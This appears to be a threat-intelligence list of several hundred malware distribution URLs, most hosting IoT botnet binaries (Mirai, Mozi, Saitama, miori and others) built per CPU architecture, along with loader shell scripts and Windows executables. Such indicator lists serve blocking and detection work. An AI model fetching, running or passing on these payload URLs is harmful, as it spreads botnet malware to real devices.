## 140 107.182.129.226/a/sh4
## 724 107.182.129.226/a/spc
## 40 107.182.129.226/a/wget.sh
## 735 107.182.129.226/a/x86
## 1120 107.182.129.226/new.sh
## 1149 107.182.129.226/uwu/arm
## 621 107.182.129.226/uwu/arm5
## 512 107.182.129.226/uwu/arm6
## 235 107.182.129.226/uwu/arm7
## 467 107.182.129.226/uwu/m68k
## 457 107.182.129.226/uwu/mips
## 440 107.182.129.226/uwu/mpsl
## 1065 107.182.129.226/uwu/ppc
## 141 107.182.129.226/uwu/sh4
## 725 107.182.129.226/uwu/spc
## 734 107.182.129.226/uwu/x86
## 932 107.182.129.239/a-r.m-4.Fourloko
## 582 107.182.129.239/a-r.m-5.Fourloko
## 566 107.182.129.239/a-r.m-6.Fourloko
## 14 107.182.129.239/Fourloko.sh
## 546 107.182.129.239/i-5.8-6.Fourloko
## 971 107.182.129.239/m-6.8-k.Fourloko
## 588 107.182.129.239/m-i.p-s.Fourloko
## 622 107.182.129.239/m-p.s-l.Fourloko
## 930 107.182.129.239/p-p.c-.Fourloko
## 931 107.182.129.239/p-p.c-.Fourloko.1
## 405 107.182.129.239/s-h.4-.Fourloko
## 242 107.182.129.239/x-3.2-.Fourloko
## 53 107.182.129.239/x-8.6-.Fourloko
## 573 107.189.31.181/db0fa4b8db0333367e9bda3ab68b8042.arm
## 705 107.189.31.181/db0fa4b8db0333367e9bda3ab68b8042.arm5
## 1051 107.189.31.181/db0fa4b8db0333367e9bda3ab68b8042.arm6
## 107 107.189.31.181/db0fa4b8db0333367e9bda3ab68b8042.m68k
## 845 107.189.31.181/db0fa4b8db0333367e9bda3ab68b8042.mips
## 980 107.189.31.181/db0fa4b8db0333367e9bda3ab68b8042.mpsl
## 175 107.189.31.181/db0fa4b8db0333367e9bda3ab68b8042.ppc
## 128 107.189.31.181/db0fa4b8db0333367e9bda3ab68b8042.sh4
## 273 107.189.31.181/db0fa4b8db0333367e9bda3ab68b8042.spc
## 882 107.189.31.181/db0fa4b8db0333367e9bda3ab68b8042.x86
## 253 107.189.31.181/jaws
## 614 109.206.241.129/666.sh
## 490 109.206.241.129/666bins/666.arm5
## 935 109.206.241.129/666bins/666.arm6
## 463 109.206.241.129/666bins/666.arm7
## 972 109.206.241.129/666bins/666.mips
## 101 109.206.241.129/666bins/666.mpsl
## 504 109.206.241.129/666bins/666.ppc
## 279 109.206.241.129/666bins/666.x86
## 629 109.206.241.211/nyauwu.arm
## 491 109.206.241.211/nyauwu.arm5
## 583 109.206.241.211/nyauwu.arm6
## 584 109.206.241.211/nyauwu.arm7
## 813 109.206.241.211/nyauwu.i586
## 1179 109.206.241.211/nyauwu.i686
## 432 109.206.241.211/nyauwu.mips
## 664 109.206.241.211/nyauwu.mipsel
## 898 109.206.241.211/nyauwu.sh4
## 16 109.206.241.211/nyauwu.x86_64
## 99 109.206.241.211/wget.sh
## 414 113.106.167.11/index.html
## 1005 113.106.167.11/x/1sh
## 398 113.106.167.11/x/irq0
## 826 113.106.167.11/x/pty
## 718 113.106.167.11/x/tty0
## 606 113.106.167.11/x/tty1
## 377 113.106.167.11/x/tty2
## 670 113.106.167.11/x/tty3
## 836 113.106.167.11/x/tty4
## 831 113.106.167.11/x/tty5
## 368 113.106.167.11/x/tty6
## 292 115.28.78.227/4477/360.exe
## 233 115.28.78.227/4477/360kuandaicesu.zip
## 632 115.28.78.227/4477/FileSu.scr
## 654 115.28.78.227/4477/xxs
## 284 115.55.61.147/35120/index.html
## 283 115.55.61.147/35120/Mozi.m
## 866 115.61.118.35/58226/Mozi.a
## 286 117.195.86.34/34673/Mozi.m
## 427 118.233.62.191/60507/index.html
## 426 118.233.62.191/60507/Mozi.m
## 865 123.130.176.197/42880/Mozi.m
## 1144 128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
## 920 128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
## 1096 128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
## 226 128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
## 979 128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
## 362 128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
## 543 128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
## 596 128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
## 453 128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
## 525 128.199.134.42/jaws
## 1009 136.144.41.55/bins/Saitama1.sh
## 208 136.144.41.55/bins/Saitama121.arm
## 147 136.144.41.55/bins/Saitama121.arm5
## 748 136.144.41.55/bins/Saitama121.arm6
## 1172 136.144.41.55/bins/Saitama121.arm7
## 1148 136.144.41.55/bins/Saitama121.m68k
## 219 136.144.41.55/bins/Saitama121.mips
## 706 136.144.41.55/bins/Saitama121.mpsl
## 1085 136.144.41.55/bins/Saitama121.ppc
## 644 136.144.41.55/bins/Saitama121.sh4
## 828 136.144.41.55/bins/Saitama121.x86
## 83 141.95.55.167/a5as4d5asd5asd4as5d/bash
## 357 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropista86
## 265 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropista8k
## 1082 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropistah4
## 393 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropistam4
## 65 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropistam5
## 299 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropistam6
## 1136 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropistam7
## 1083 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropistapc
## 27 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropistaps
## 58 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropistasl
## 404 141.95.55.167/a5as4d5asd5asd4as5d/mizakotropistax64
## 731 141.95.55.167/a5as4d5asd5asd4as5d/ulimit.sh
## 354 141.95.55.167/a5as4d5asd5asd4as5d/x86
## 352 141.95.55.167/sshd
## 745 156.226.173.28/ma/meihao.arc
## 657 156.226.173.28/ma/meihao.arm
## 493 156.226.173.28/ma/meihao.arm5
## 1018 156.226.173.28/ma/meihao.arm6
## 843 156.226.173.28/ma/meihao.arm7
## 93 156.226.173.28/ma/meihao.i686
## 240 156.226.173.28/ma/meihao.m68k
## 630 156.226.173.28/ma/meihao.mips
## 936 156.226.173.28/ma/meihao.mpsl
## 1146 156.226.173.28/ma/meihao.ppc
## 998 156.226.173.28/ma/meihao.sh4
## 431 156.226.173.28/ma/meihao.spc
## 221 156.226.173.28/ma/meihao.x86
## 1068 156.234.211.155/ma/index.html
## 1059 156.234.211.155/ma/meihao.arc
## 908 156.234.211.155/ma/meihao.arm
## 924 156.234.211.155/ma/meihao.arm5
## 746 156.234.211.155/ma/meihao.arm6
## 802 156.234.211.155/ma/meihao.arm7
## 80 156.234.211.155/ma/meihao.i686
## 674 156.234.211.155/ma/meihao.m68k
## 1054 156.234.211.155/ma/meihao.mips
## 1039 156.234.211.155/ma/meihao.mpsl
## 454 156.234.211.155/ma/meihao.ppc
## 347 156.234.211.155/ma/meihao.sh4
## 26 156.234.211.155/ma/meihao.spc
## 103 156.234.211.155/ma/meihao.x86
## 308 159.223.13.188/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
## 919 159.223.13.188/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
## 482 159.223.13.188/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
## 1056 159.223.13.188/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
## 577 159.223.13.188/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
## 1113 159.223.13.188/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
## 307 159.223.13.188/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
## 130 159.223.13.188/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
## 592 159.223.13.188/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
## 561 159.223.13.188/jaws
## 1134 159.89.44.77/idk/home.arc
## 523 159.89.44.77/idk/home.arm
## 382 159.89.44.77/idk/home.arm5
## 872 159.89.44.77/idk/home.arm6
## 822 159.89.44.77/idk/home.arm7
## 438 159.89.44.77/idk/home.m68k
## 48 159.89.44.77/idk/home.mips
## 1088 159.89.44.77/idk/home.mpsl
## 277 159.89.44.77/idk/home.ppc
## 1090 159.89.44.77/idk/home.sh4
## 1138 159.89.44.77/idk/home.spc
## 9 159.89.44.77/idk/home.x86
## 651 159.89.44.77/idk/home.x86_64
## 871 163.123.142.241/arm5
## 509 163.123.142.241/arm6
## 1098 163.123.142.241/arm7
## 796 163.123.142.241/i586
## 340 163.123.142.241/m68k
## 537 163.123.142.241/mips
## 532 163.123.142.241/mipsel
## 954 163.123.142.241/sh4
## 355 163.123.142.241/x86_64
## 174 163.123.143.126/dark.arm5
## 833 163.123.143.126/dark.arm6
## 894 163.123.143.126/dark.arm7
## 50 163.123.143.126/dark.m68k
## 887 163.123.143.126/dark.mips
## 136 163.123.143.126/dark.mpsl
## 195 163.123.143.126/dark.ppc
## 351 163.123.143.126/dark.sh4
## 800 163.123.143.126/dark.x86
## 647 163.123.143.126/x.sh
## 1002 163.142.102.117/49906/index.html
## 1000 163.142.102.117/49906/Mozi.a
## 1001 163.179.162.206/38334/Mozi.m
## 999 163.179.162.206/index.html
## 985 168.138.128.171/lol/steamamd64
## 358 175.178.77.241/4543/dwer.exe
## 798 175.178.77.241/4543/kaf
## 721 176.123.1.44/lx/a
## 365 176.123.1.44/lx/apep.arm
## 737 176.123.1.44/lx/apep.arm5
## 146 176.123.1.44/lx/apep.arm6
## 715 176.123.1.44/lx/apep.arm7
## 477 176.123.1.44/lx/apep.m68k
## 323 176.123.1.44/lx/apep.mips
## 199 176.123.1.44/lx/apep.mpsl
## 251 176.123.1.44/lx/apep.ppc
## 531 176.123.1.44/lx/apep.sh4
## 964 176.123.1.44/lx/apep.spc
## 722 176.123.1.44/lx/apep.x86
## 324 176.123.1.44/lx/u
## 325 176.123.1.44/lx/x
## 350 178.18.250.52/a/mirai.arm5
## 237 178.18.250.52/a/mirai.arm6
## 907 178.18.250.52/a/mirai.arm7
## 1081 178.18.250.52/a/mirai.m68k
## 37 178.18.250.52/a/mirai.mips
## 1156 178.18.250.52/a/mirai.mipsel
## 824 178.18.250.52/a/mirai.sh
## 1094 178.18.250.52/a/mirai.sh4
## 1 178.18.250.52/a/mirai.spc
## 864 178.18.250.52/a/mirai.x86
## 649 178.62.220.66/k13msmfs2/00100001010001001000001001.arc
## 663 178.62.220.66/k13msmfs2/00100001010001001000001001.arm
## 623 178.62.220.66/k13msmfs2/00100001010001001000001001.arm5
## 172 178.62.220.66/k13msmfs2/00100001010001001000001001.arm6
## 56 178.62.220.66/k13msmfs2/00100001010001001000001001.arm7
## 817 178.62.220.66/k13msmfs2/00100001010001001000001001.i486
## 819 178.62.220.66/k13msmfs2/00100001010001001000001001.i686
## 419 178.62.220.66/k13msmfs2/00100001010001001000001001.m68k
## 679 178.62.220.66/k13msmfs2/00100001010001001000001001.mips
## 1152 178.62.220.66/k13msmfs2/00100001010001001000001001.mpsl
## 850 178.62.220.66/k13msmfs2/00100001010001001000001001.ppc
## 333 178.62.220.66/k13msmfs2/00100001010001001000001001.sh4
## 1024 178.62.220.66/k13msmfs2/00100001010001001000001001.spc
## 986 178.62.220.66/k13msmfs2/00100001010001001000001001.x86
## 696 178.62.220.66/k13msmfs2/00100001010001001000001001.x86_64
## 1123 179.43.156.214/c.sh
## 1036 179.43.156.214/miori.arc
## 201 179.43.156.214/miori.arm
## 600 179.43.156.214/miori.arm5
## 11 179.43.156.214/miori.arm6
## 12 179.43.156.214/miori.arm7
## 447 179.43.156.214/miori.i5
## 557 179.43.156.214/miori.i6
## 153 179.43.156.214/miori.m68k
## 91 179.43.156.214/miori.mips
## 133 179.43.156.214/miori.mpsl
## 73 179.43.156.214/miori.ppc
## 847 179.43.156.214/miori.sh4
## 387 179.43.156.214/miori.spc
## 965 179.43.156.214/miori.x86
## 231 179.43.156.214/sh
## 587 179.43.156.214/w.sh
## 328 179.43.175.5/6o1
## 958 179.43.175.5/bins/arc
## 521 179.43.175.5/bins/arm4
## 1137 179.43.175.5/bins/arm5
## 183 179.43.175.5/bins/arm6
## 962 179.43.175.5/bins/arm7
## 636 179.43.175.5/bins/i686
## 878 179.43.175.5/bins/m68k
## 145 179.43.175.5/bins/mips
## 460 179.43.175.5/bins/mpsl
## 406 179.43.175.5/bins/sh4
## 131 179.43.175.5/bins/spc
## 44 179.43.175.5/bins/x86
## 441 179.43.175.5/bins/x86_64
## 991 179.43.175.5/t1.sh
## 160 179.43.175.83/arm
## 742 179.43.175.83/arm5
## 1080 179.43.175.83/arm7
## 542 179.43.175.83/index.html
## 918 179.43.175.83/mips
## 276 179.43.175.83/mipsel
## 841 179.43.175.83/x86_64
## 1087 185.132.53.105/multi/l.arm4
## 702 185.132.53.105/multi/l.arm5
## 310 185.132.53.105/multi/l.arm6
## 969 185.132.53.105/multi/l.arm7
## 708 185.132.53.105/multi/l.m68k
## 211 185.132.53.105/multi/l.mips
## 625 185.132.53.105/multi/l.mips64
## 1178 185.132.53.105/multi/l.mipsel
## 507 185.132.53.105/multi/l.powerpc
## 248 185.132.53.105/multi/l.sh4
## 524 185.132.53.105/multi/l.sparc
## 75 185.132.53.105/multi/l.x86_64
## 1063 185.132.53.105/xplt/adsl.sh
## 209 185.132.53.105/xplt/dvr
## 469 185.132.53.105/xplt/ip.sh
## 977 185.132.53.105/xplt/lv.sh
## 1176 185.132.53.105/xplt/mrtlk
## 968 185.132.53.105/xplt/mrtm7
## 212 185.132.53.105/xplt/mrtmps
## 210 185.132.53.105/xplt/mrtmpsk
## 1177 185.132.53.105/xplt/mrtmpsl
## 703 185.132.53.105/xplt/mtmr5
## 701 185.132.53.105/xplt/mtmr5v2
## 1072 185.132.53.105/xplt/think
## 1070 185.132.53.105/xplt/thinks
## 1071 185.132.53.105/xplt/xtld
## 893 185.156.72.4/13978/exiles.exe
## 784 185.156.72.4/47487/s.exe
## 538 185.156.72.4/573/LinkOpener.exe
## 892 185.156.72.4/745/exiles.exe
## 783 185.199.224.186/24875/AV520.exe
## 111 185.199.224.186/24875/s
## 345 185.199.224.186/24875/s.exe
## 539 185.199.224.210/17845/s.exe
## 576 185.199.244.186/24875/AV520.exe
## 110 185.199.244.186/24875/s
## 344 185.199.244.186/24875/s.exe
## 540 185.199.244.210/17845/s.exe
## 203 185.216.71.192/jaws
## 953 185.216.71.192/ma/meihao.arm
## 300 185.216.71.192/ma/meihao.arm5
## 1135 185.216.71.192/ma/meihao.arm6
## 458 185.216.71.192/ma/meihao.arm7
## 275 185.216.71.192/ma/meihao.i686
## 963 185.216.71.192/ma/meihao.m68k
## 1053 185.216.71.192/ma/meihao.mips
## 881 185.216.71.192/ma/meihao.mpsl
## 990 185.216.71.192/ma/meihao.ppc
## 1124 185.216.71.192/ma/meihao.sh4
## 610 185.216.71.192/ma/meihao.spc
## 939 185.216.71.192/ma/meihao.x86
## 855 185.225.74.55/arm
## 126 185.225.74.55/arm5
## 1008 185.225.74.55/arm6
## 23 185.225.74.55/arm7
## 976 185.225.74.55/ljc.sh
## 97 185.225.74.55/m68k
## 938 185.225.74.55/mips
## 98 185.225.74.55/mpsl
## 289 185.225.74.55/ppc
## 121 185.225.74.55/sh4
## 220 185.225.74.55/spc
## 839 185.225.74.55/x86
## 290 185.225.74.55/x86_64
## 336 185.28.39.119/miori.arm
## 517 185.28.39.119/miori.arm5
## 515 185.28.39.119/miori.arm6
## 983 185.28.39.119/miori.arm7
## 1104 185.28.39.119/miori.mips
## 429 185.28.39.119/miori.mpsl
## 753 185.28.39.119/miori.ppc
## 155 185.28.39.119/miori.sh4
## 806 185.28.39.119/miori.x86
## 1112 185.28.39.119/sh
## 302 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc
## 834 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
## 356 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
## 154 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
## 497 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
## 241 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
## 910 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k
## 535 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
## 1095 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
## 106 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
## 666 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4
## 410 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc
## 483 193.111.250.222/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
## 660 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc
## 94 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
## 648 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
## 166 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
## 858 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
## 250 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686
## 305 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k
## 873 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips
## 511 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl
## 4 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc
## 1102 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4
## 563 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc
## 909 193.47.61.42/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
## 1006 193.47.61.42/jaws
## 978 194.242.56.116/mirai.arm5
## 710 194.242.56.116/mirai.arm6
## 738 194.242.56.116/mirai.arm7
## 43 194.242.56.116/mirai.m68k
## 5 194.242.56.116/mirai.mips
## 236 194.242.56.116/mirai.mipsel
## 729 194.242.56.116/mirai.sh
## 891 194.242.56.116/mirai.sh4
## 46 194.242.56.116/mirai.spc
## 361 194.242.56.116/mirai.x86
## 693 194.31.98.109/p033311.arc
## 685 194.31.98.109/p033311.arm
## 694 194.31.98.109/p033311.arm5
## 695 194.31.98.109/p033311.arm6
## 691 194.31.98.109/p033311.arm7
## 690 194.31.98.109/p033311.i486
## 686 194.31.98.109/p033311.i686
## 687 194.31.98.109/p033311.m68k
## 682 194.31.98.109/p033311.mips
## 689 194.31.98.109/p033311.mpsl
## 681 194.31.98.109/p033311.ppc
## 684 194.31.98.109/p033311.sh4
## 683 194.31.98.109/p033311.spc
## 688 194.31.98.109/p033311.x86
## 692 194.31.98.109/p033311.x86_64
## 627 194.31.98.17/bins/TropicalV1.arm
## 256 194.31.98.17/bins/TropicalV1.arm5
## 984 194.31.98.17/bins/TropicalV1.arm6
## 598 194.31.98.17/bins/TropicalV1.arm7
## 402 194.31.98.17/bins/TropicalV1.m68k
## 331 194.31.98.17/bins/TropicalV1.mips
## 867 194.31.98.17/bins/TropicalV1.mpsl
## 30 194.31.98.17/bins/TropicalV1.ppc
## 550 194.31.98.17/bins/TropicalV1.sh4
## 1044 194.31.98.17/bins/TropicalV1.spc
## 1012 194.31.98.17/bins/TropicalV1.x86
## 1160 194.31.98.205/arc
## 433 194.31.98.205/arm
## 564 194.31.98.205/arm5
## 595 194.31.98.205/arm6
## 1042 194.31.98.205/arm7
## 255 194.31.98.205/mips
## 505 194.31.98.205/mpsl
## 548 194.31.98.205/ppc
## 911 194.31.98.205/sh
## 394 194.31.98.205/sh4
## 227 194.31.98.205/x86_64
## 944 194.55.224.203/arm
## 139 194.55.224.203/arm5
## 390 194.55.224.203/arm6
## 934 194.55.224.203/arm7
## 975 194.55.224.203/D.sh
## 974 194.55.224.203/ljc.sh
## 422 194.55.224.203/m68k
## 32 194.55.224.203/mips
## 51 194.55.224.203/mpsl
## 100 194.55.224.203/ppc
## 306 194.55.224.203/sh4
## 31 194.55.224.203/spc
## 811 194.55.224.203/x86
## 281 194.55.224.203/x86_64
## 635 198.98.49.79/deathtrump.arc
## 342 198.98.49.79/deathtrump.arm5
## 844 198.98.49.79/deathtrump.arm7
## 218 198.98.49.79/deathtrump.i486
## 1106 198.98.49.79/deathtrump.i686
## 728 198.98.49.79/deathtrump.m68k
## 613 198.98.49.79/deathtrump.mips
## 182 198.98.49.79/deathtrump.mpsl
## 536 198.98.49.79/deathtrump.ppc
## 1016 198.98.49.79/deathtrump.sh4
## 1170 198.98.49.79/deathtrump.spc
## 381 198.98.49.79/deathtrump.x86
## 494 198.98.49.79/deathtrump.x86_64
## 1118 198.98.49.79/exp.sh
## 337 2.56.56.162/miori.arm
## 518 2.56.56.162/miori.arm5
## 520 2.56.56.162/miori.arm6
## 981 2.56.56.162/miori.arm7
## 1105 2.56.56.162/miori.mips
## 430 2.56.56.162/miori.mpsl
## 752 2.56.56.162/miori.ppc
## 157 2.56.56.162/miori.sh4
## 807 2.56.56.162/miori.x86
## 138 2.56.56.162/sh
## 468 2.56.57.98/arm5
## 863 2.56.57.98/arm7
## 213 2.56.57.98/hahahaha.sh
## 1074 2.56.57.98/m68k
## 495 2.56.57.98/mips
## 343 2.56.57.98/mipsel
## 586 2.56.57.98/powerpc
## 443 2.56.57.98/sh4
## 653 2.56.57.98/x86_64
## 225 2.56.59.196/multiuwu.sh
## 638 2.56.59.196/Saitama121.arm
## 1067 2.56.59.196/Saitama121.arm5
## 842 2.56.59.196/Saitama121.arm6
## 102 2.56.59.196/Saitama121.arm7
## 861 2.56.59.196/Saitama121.m68k
## 149 2.56.59.196/Saitama121.mips
## 1159 2.56.59.196/Saitama121.mpsl
## 177 2.56.59.196/Saitama121.ppc
## 559 2.56.59.196/Saitama121.sh4
## 579 2.56.59.196/Saitama121.spc
## 169 2.56.59.196/Saitama121.x86
## 877 2.indexsinas.me/811/86.exe
## 21 2.indexsinas.me/811/c64.exe
## 743 2.indexsinas.me/811/iexplore.exe
## 285 201.150.180.187/51819/Mozi.m
## 380 202.110.187.205/x/1sh
## 184 202.110.187.205/x/2sh
## 631 202.110.187.205/x/3sh
## 159 202.110.187.205/x/irq0
## 1108 202.110.187.205/x/irq1
## 578 202.110.187.205/x/irq2
## 646 202.110.187.205/x/pty
## 260 202.110.187.205/x/tty0
## 1058 202.110.187.205/x/tty1
## 29 202.110.187.205/x/tty2
## 118 202.110.187.205/x/tty3
## 498 202.110.187.205/x/tty4
## 1147 202.110.187.205/x/tty5
## 912 202.110.187.205/x/tty6
## 854 203.28.246.150/a-r.m-4.SNOOPY
## 143 203.28.246.150/a-r.m-5.SNOOPY
## 572 203.28.246.150/a-r.m-6.SNOOPY
## 1155 203.28.246.150/a-r.m-7.SNOOPY
## 8 203.28.246.150/i-5.8-6.SNOOPY
## 571 203.28.246.150/m-6.8-k.SNOOPY
## 1034 203.28.246.150/m-i.p-s.SNOOPY
## 730 203.28.246.150/m-p.s-l.SNOOPY
## 853 203.28.246.150/p-p.c-.SNOOPY
## 699 203.28.246.150/s-h.4-.SNOOPY
## 816 203.28.246.150/SnOoPy.sh
## 656 203.28.246.150/x-3.2-.SNOOPY
## 1007 203.28.246.150/x-8.6-.SNOOPY
## 1025 208.67.104.31/bins/arm4
## 372 208.67.104.31/bins/arm5
## 465 208.67.104.31/bins/arm6
## 565 208.67.104.31/bins/arm7
## 425 208.67.104.31/bins/i686
## 547 208.67.104.31/bins/m68k
## 119 208.67.104.31/bins/mips
## 360 208.67.104.31/bins/sh4
## 258 208.67.104.31/bins/x86
## 803 208.67.104.31/bins/x86_64
## 727 208.67.104.31/ssh.sh
## 900 209.141.33.208/bins/Zeus.arm
## 1117 209.141.33.208/bins/Zeus.arm5
## 464 209.141.33.208/bins/Zeus.arm6
## 129 209.141.33.208/bins/Zeus.arm7
## 906 209.141.33.208/bins/Zeus.m68k
## 530 209.141.33.208/bins/Zeus.mips
## 437 209.141.33.208/bins/Zeus.mpsl
## 471 209.141.33.208/bins/Zeus.ppc
## 1061 209.141.33.208/bins/Zeus.sh4
## 346 209.141.33.208/bins/Zeus.spc
## 988 209.141.33.208/bins/Zeus.x86
## 1046 209.141.59.94/jaws
## 533 212.192.246.30/bins/arm
## 327 212.192.246.30/bins/arm5
## 180 212.192.246.30/bins/arm6
## 508 212.192.246.30/bins/arm7
## 597 212.192.246.30/bins/i686
## 2 212.192.246.30/bins/m68k
## 59 212.192.246.30/bins/mips
## 150 212.192.246.30/bins/mpsl
## 1121 212.192.246.30/bins/ppc
## 190 212.192.246.30/bins/sh4
## 189 212.192.246.30/bins/spc
## 52 212.192.246.30/bins/x86
## 116 212.192.246.30/wget.sh
## 339 213.232.235.203/0x83911d24Fx.sh
## 675 23.254.247.214/armv4l
## 581 23.254.247.214/armv5l
## 413 23.254.247.214/armv6l
## 108 23.254.247.214/Heisenbergbins.sh
## 1069 23.254.247.214/Heisenbergtftp1.sh
## 389 23.254.247.214/i586
## 676 23.254.247.214/i686
## 711 23.254.247.214/index.html
## 436 23.254.247.214/m68k
## 415 23.254.247.214/mips
## 555 23.254.247.214/mipsel
## 1052 23.254.247.214/powerpc
## 904 23.254.247.214/sh4
## 643 23.254.247.214/sparc
## 1111 23.254.247.214/x86
## 66 23.94.22.13/a/arm
## 655 23.94.22.13/a/arm5
## 677 23.94.22.13/a/arm6
## 1110 23.94.22.13/a/arm7
## 484 23.94.22.13/a/index.html
## 263 23.94.22.13/a/mips
## 997 23.94.22.13/a/mipsel
## 884 23.94.22.13/a/sh4
## 274 23.94.22.13/a/sparc
## 309 23.94.22.13/a/wget.sh
## 785 23.94.22.13/a/x86_64
## 1033 23.94.7.175/DOTs4y/arm
## 973 23.94.7.175/DOTs4y/arm6
## 164 23.94.7.175/DOTs4y/arm7
## 7 23.94.7.175/DOTs4y/m68k
## 114 23.94.7.175/DOTs4y/mips
## 489 23.94.7.175/DOTs4y/mpsl
## 319 23.94.7.175/DOTs4y/ppc
## 42 23.94.7.175/DOTs4y/sh4
## 55 23.94.7.175/DOTs4y/spc
## 917 23.94.7.175/DOTs4y/x86
## 714 23.95.0.211/index.html
## 640 23.95.186.164/a-r.m-4.GHOUL
## 781 23.95.186.164/a-r.m-5.GHOUL
## 38 23.95.186.164/a-r.m-6.GHOUL
## 1101 23.95.186.164/a-r.m-7.GHOUL
## 1180 23.95.186.164/cache
## 3 23.95.186.164/hexout.txt
## 435 23.95.186.164/i-5.8-6.GHOUL
## 373 23.95.186.164/m-6.8-k.GHOUL
## 570 23.95.186.164/m-i.p-s.GHOUL
## 704 23.95.186.164/m-p.s-l.GHOUL
## 639 23.95.186.164/p-p.c-.GHOUL
## 641 23.95.186.164/p-p.c-.GHOUL.1
## 193 23.95.186.164/s-h.4-.GHOUL
## 1158 23.95.186.164/x-3.2-.GHOUL
## 1004 23.95.186.164/x-8.6-.GHOUL
## 874 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc
## 1038 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm
## 316 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5
## 526 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6
## 955 31.210.20.109/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7
